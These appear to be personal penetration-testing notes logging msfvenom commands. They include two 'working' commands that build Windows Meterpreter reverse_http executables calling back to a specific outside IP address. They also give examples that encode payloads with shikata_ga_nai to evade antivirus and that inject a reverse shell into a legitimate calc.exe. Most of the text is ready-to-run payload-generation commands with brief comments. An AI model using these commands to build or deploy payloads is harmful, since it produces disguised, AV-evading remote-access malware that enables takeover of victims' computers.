Penetration Testing Notes 4 - msfvenom Command Log

Working commands

msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_3.exe
msfvenom -p windows/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_4.exe

Usage

MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom [options] <var=val>
Example: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--smallest Generate the smallest possible payload using all available encoders
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, thus performing a subtraction to prepend a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message

Examples

Generate a plain, unencoded payload (no encoding -> output bytes are fixed -> caught by AV right away)

msfvenom -p <payload> -f <format> -o <path>

msfvenom -p windows/meterpreter/reverse_tcp -f c -o 1.c

Generate a payload after running it through an encoder

msfvenom -p <payload> -e <encoder> -i <count> -n <length> -f <format> -o <path>

msfvenom -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o C:\back.exe

Generate a payload bundled into a legitimate file (not yet tested whether the -e option can be added here)

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -x C:\calc.exe -k -f exe -o C:\shell.exe

List the supported payloads

msfvenom -l payloads

List the supported output file formats

msfvenom --help-formats

List the supported encoders (used when trying to evade AV)

msfvenom -l encoders

List the supported NOP sled modules (used when trying to evade AV)

msfvenom -l nops